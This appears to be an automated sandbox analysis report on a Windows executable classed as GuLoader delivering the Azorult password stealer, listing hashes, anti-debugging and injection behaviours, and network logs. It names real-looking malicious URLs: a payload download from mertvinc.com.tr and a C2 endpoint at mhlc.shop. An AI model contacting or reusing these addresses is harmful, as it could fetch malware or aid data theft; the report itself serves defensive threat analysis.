Analysis

  • max time kernel
    53s
  • max time network
    59s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 17:17

General

  • Target

    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe

  • Size

    543KB

  • MD5

    e555bbbffc72df8a3b14eafd48f36bbc

  • SHA1

    322db6d82578f212e8fb18c7880e9f9de44580b4

  • SHA256

    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b

  • SHA512

    a9ef31c67cc9e4c5c0ade06d37447978228e967139717b2201eb7acf67d17a5c556cc19927c8d5791b0022f8e3f259730cd85ae841806ef9f7e9234a113b0270

  • SSDEEP

    12288:32EI5cRYSzvuwIkyXS9bVVsKZIUvhnmd3ZhZw:3w6RfJIRIVaKZnmdPZw

Malware Config

Extracted

Family

azorult

C2

http://mhlc.shop/GI341/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Guloader family
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    "C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2548
    • C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
      "C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"
      2⤵
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      PID:2964

Network

  • flag-us
    DNS
    mertvinc.com.tr
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    Remote address:
    8.8.8.8:53
    Request
    mertvinc.com.tr
    IN A
    Response
    mertvinc.com.tr
    IN A
    185.244.144.68
  • flag-tr
    GET
    http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    Remote address:
    185.244.144.68:80
    Request
    GET /LAbxmTzNBCWjnKNdG58.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: mertvinc.com.tr
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Last-Modified: Mon, 11 Nov 2024 12:17:10 GMT
    Etag: "1c040-6731f5c6-3fa9fa73f7b85d5c;;;"
    Accept-Ranges: bytes
    Content-Length: 114752
    Date: Tue, 19 Nov 2024 16:24:57 GMT
    Server: LiteSpeed
    X-Powered-By: PleskLin
  • flag-us
    DNS
    mhlc.shop
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    Remote address:
    8.8.8.8:53
    Request
    mhlc.shop
    IN A
    Response
    mhlc.shop
    IN A
    172.67.208.107
    mhlc.shop
    IN A
    104.21.23.20
  • flag-us
    POST
    http://mhlc.shop/GI341/index.php
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    Remote address:
    172.67.208.107:80
    Request
    POST /GI341/index.php HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Host: mhlc.shop
    Content-Length: 99
    Cache-Control: no-cache
    Response
    HTTP/1.1 403 Forbidden
    Date: Tue, 19 Nov 2024 17:18:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nmm%2FxT3HWFYVQbLZJt6gMi2n4fHm63j%2B2pCGy%2F9%2FMuxK20HadSeVtv7ZyxEeehZ4I371y7RweCOnSgTLADT9h9b9LFQNHZ%2FRzsOMa8AK%2BCRVF%2FmWBa90q0%2FmPww%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e51dbfc38f3be3e-DUB
  • 185.244.144.68:80
    http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
    http
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    2.4kB
    118.6kB
    48
    88

    HTTP Request

    GET http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin

    HTTP Response

    200
  • 172.67.208.107:80
    http://mhlc.shop/GI341/index.php
    http
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    582 B
    5.5kB
    7
    9

    HTTP Request

    POST http://mhlc.shop/GI341/index.php

    HTTP Response

    403
  • 8.8.8.8:53
    mertvinc.com.tr
    dns
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    61 B
    77 B
    1
    1

    DNS Request

    mertvinc.com.tr

    DNS Response

    185.244.144.68

  • 8.8.8.8:53
    mhlc.shop
    dns
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    55 B
    87 B
    1
    1

    DNS Request

    mhlc.shop

    DNS Response

    172.67.208.107
    104.21.23.20

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\nsj9EC0.tmp\System.dll

    Filesize

    11KB

    MD5

    75ed96254fbf894e42058062b4b4f0d1

    SHA1

    996503f1383b49021eb3427bc28d13b5bbd11977

    SHA256

    a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7

    SHA512

    58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4

  • memory/2548-9-0x0000000002C60000-0x0000000005312000-memory.dmp

    Filesize

    38.7MB

  • memory/2548-10-0x0000000002C60000-0x0000000005312000-memory.dmp

    Filesize

    38.7MB

  • memory/2548-11-0x0000000077911000-0x0000000077A12000-memory.dmp

    Filesize

    1.0MB

  • memory/2548-12-0x0000000077910000-0x0000000077AB9000-memory.dmp

    Filesize

    1.7MB

  • memory/2548-14-0x0000000002C60000-0x0000000005312000-memory.dmp

    Filesize

    38.7MB

  • memory/2964-13-0x0000000077910000-0x0000000077AB9000-memory.dmp

    Filesize

    1.7MB

  • memory/2964-15-0x00000000007E0000-0x0000000001842000-memory.dmp

    Filesize

    16.4MB

  • memory/2964-16-0x00000000007E0000-0x0000000001842000-memory.dmp

    Filesize

    16.4MB

  • memory/2964-17-0x00000000007E0000-0x0000000001842000-memory.dmp

    Filesize

    16.4MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.